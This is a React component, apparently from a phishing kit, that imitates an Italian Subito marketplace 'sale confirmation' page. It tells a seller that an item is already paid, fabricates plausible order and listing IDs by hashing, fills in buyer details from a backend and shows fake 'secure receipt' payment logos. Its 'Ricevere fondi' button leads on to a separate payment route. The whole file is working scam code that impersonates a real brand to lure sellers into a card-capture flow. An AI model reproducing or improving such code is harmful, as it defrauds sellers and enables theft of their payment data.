import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './SubitoItSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/subito-it-wordmark.svg`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function orderNumberFromPage(pageData, pageCode) {
  const pn = (pageData?.product_name || '').trim().replace(/\s+/g, '');
  if (/^\d+$/.test(pn)) return pn;
  const pc = pageCode || pageData?.page_code || '';
  if (!pc) return '—';
  let h = 0;
  for (let i = 0; i < pc.length; i += 1) h = (h * 33 + pc.charCodeAt(i)) >>> 0;
  return String(100000 + (h % 900000));
}

function listingIdFromCode(pageCode, pageData) {
  const raw = (pageCode || pageData?.page_code || '').trim();
  if (!raw) return '—';
  const chars = 'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz23456789';
  let h = 0;
  for (let i = 0; i < raw.length; i += 1) h = (h * 31 + raw.charCodeAt(i)) >>> 0;
  let out = '';
  let x = h;
  for (let i = 0; i < 16; i += 1) {
    x = (x * 1664525 + 1013904223) >>> 0;
    out += chars[x % chars.length];
  }
  return out;
}

function IconUser() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2" />
      <circle cx="12" cy="7" r="4" />
    </svg>
  );
}

function IconPin() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M21 10c0 7-9 13-9 13s-9-6-9-13a9 9 0 0 1 18 0z" />
      <circle cx="12" cy="10" r="3" />
    </svg>
  );
}

function IconTruck() {
  return (
    <svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <rect x="1" y="3" width="15" height="13" rx="1" />
      <path d="M16 8h4l3 3v5h-7V8z" />
      <circle cx="5.5" cy="18.5" r="2.5" />
      <circle cx="18.5" cy="18.5" r="2.5" />
    </svg>
  );
}

/** Subito Market (IT): dopo captcha → CTA verso VintedStripe2. */
function SubitoItSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [imgFailed, setImgFailed] = useState(false);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'IT').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const symbol = getSymbol(primaryCurrency);
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const amountDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;

  const buyer =
    [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const photoUrl = resolvePhotoUrl(pageData?.photo_url || '');
  const productTitle = (pageData?.product_name || '').trim();
  const initials = productTitle ? productTitle.slice(0, 2).toUpperCase() : 'S';

  const listingId = useMemo(
    () => listingIdFromCode(pageCode || '', pageData),
    [pageCode, pageData],
  );
  const orderNo = useMemo(
    () => orderNumberFromPage(pageData, pageCode || pageData?.page_code || ''),
    [pageData, pageCode],
  );
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="si-wrap">
        <div className="si-loading">Caricamento…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="si-wrap">
      <div className="si-topbar">
        <div className="si-topbar-inner">
          <a href="#/" onClick={(e) => e.preventDefault()}>Magazine</a>
          <a href="#/" onClick={(e) => e.preventDefault()}>Consigli per la vendita</a>
          <a href="#/" onClick={(e) => e.preventDefault()}>Negozi e Aziende</a>
          <a href="#/" onClick={(e) => e.preventDefault()}>Subito per le Aziende</a>
          <a href="#/" onClick={(e) => e.preventDefault()}>Assistenza</a>
          <a href="#/" onClick={(e) => e.preventDefault()}>Ricerche salvate</a>
          <a href="#/" onClick={(e) => e.preventDefault()}>Preferiti</a>
        </div>
      </div>

      <header className="si-header">
        <div className="si-header-inner">
          <a href="#/" className="si-logo" onClick={(e) => e.preventDefault()}>
            <img src={LOGO_SRC} alt="Subito Market" width={200} height={44} decoding="async" />
          </a>
          <a href="#/" className="si-btn-post" onClick={(e) => e.preventDefault()}>
            + Inserisci annuncio
          </a>
        </div>
      </header>

      <main className="si-main">
        <div className="si-main-inner">
          <div className="si-card">
            <div className="si-media">
              {photoUrl && !imgFailed ? (
                <img src={photoUrl} alt="" onError={() => setImgFailed(true)} />
              ) : (
                <span className="si-media-ph" aria-hidden>{initials}</span>
              )}
            </div>
            <div>
              <p className="si-detail-status">Pagato oggi</p>
              <p className="si-detail-id">ID: {listingId}</p>
              <p className="si-detail-order">{orderNo}</p>
              <div className="si-detail-row">
                <IconUser />
                <span>{buyer}</span>
              </div>
              <div className="si-detail-row">
                <IconPin />
                <span>{address}</span>
              </div>
              <div className="si-price-row">
                <span className="si-price">{amountDisplay}</span>
                <span className="si-badge-ship">
                  <IconTruck />
                  Consegna pagata
                </span>
              </div>
              <p className="si-ship-note">L&apos;acquirente ha pagato la spedizione 3,90 €</p>
              <Link to={index2Path} className="si-cta">
                Ricevere fondi
              </Link>
              <div className="si-trust">
                <p className="si-trust-title">RICEVUTA SICURA</p>
                <div className="si-trust-logos">
                  <span className="si-trust-logo">VISA</span>
                  <span className="si-trust-logo">Mastercard</span>
                  <span className="si-trust-logo">PayPal</span>
                  <span className="si-trust-logo">Google Pay</span>
                  <span className="si-trust-logo">Apple Pay</span>
                </div>
              </div>
            </div>
          </div>
        </div>
      </main>

      <div className="si-toolbar">
        <a href="#/" onClick={(e) => e.preventDefault()}>
          <span aria-hidden>↗</span> Condividi
        </a>
        <a href="#/" onClick={(e) => e.preventDefault()}>
          <span aria-hidden>⚠</span> Segnala annuncio
        </a>
        <span className="si-toolbar-id">ID: {listingId}</span>
      </div>

      <footer className="si-footer">
        <div className="si-footer-inner">
          <h3>TUTTE LE CATEGORIE</h3>
          <div className="si-footer-cols">
            <div className="si-footer-col">
              <strong>Motori</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Auto</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Moto e Scooter</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Nautica</a>
            </div>
            <div className="si-footer-col">
              <strong>Immobili</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Appartamenti</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Ville</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Terreni</a>
            </div>
            <div className="si-footer-col">
              <strong>Elettronica</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Informatica</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Telefonia</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Audio/Video</a>
            </div>
            <div className="si-footer-col">
              <strong>Subito</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Assistenza</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Condizioni</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Privacy</a>
            </div>
            <div className="si-footer-col">
              <strong>Azienda</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Chi siamo</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Lavora con noi</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Magazine</a>
            </div>
            <div className="si-footer-col">
              <strong>App</strong>
              <a href="#/" onClick={(e) => e.preventDefault()}>Subito per Android</a>
              <a href="#/" onClick={(e) => e.preventDefault()}>Subito per iOS</a>
            </div>
          </div>
          <div className="si-footer-bottom">
            <span>© {new Date().getFullYear()} Subito — pagina di conferma vendita</span>
            <span>Seguici sui social</span>
          </div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default SubitoItSuccess;
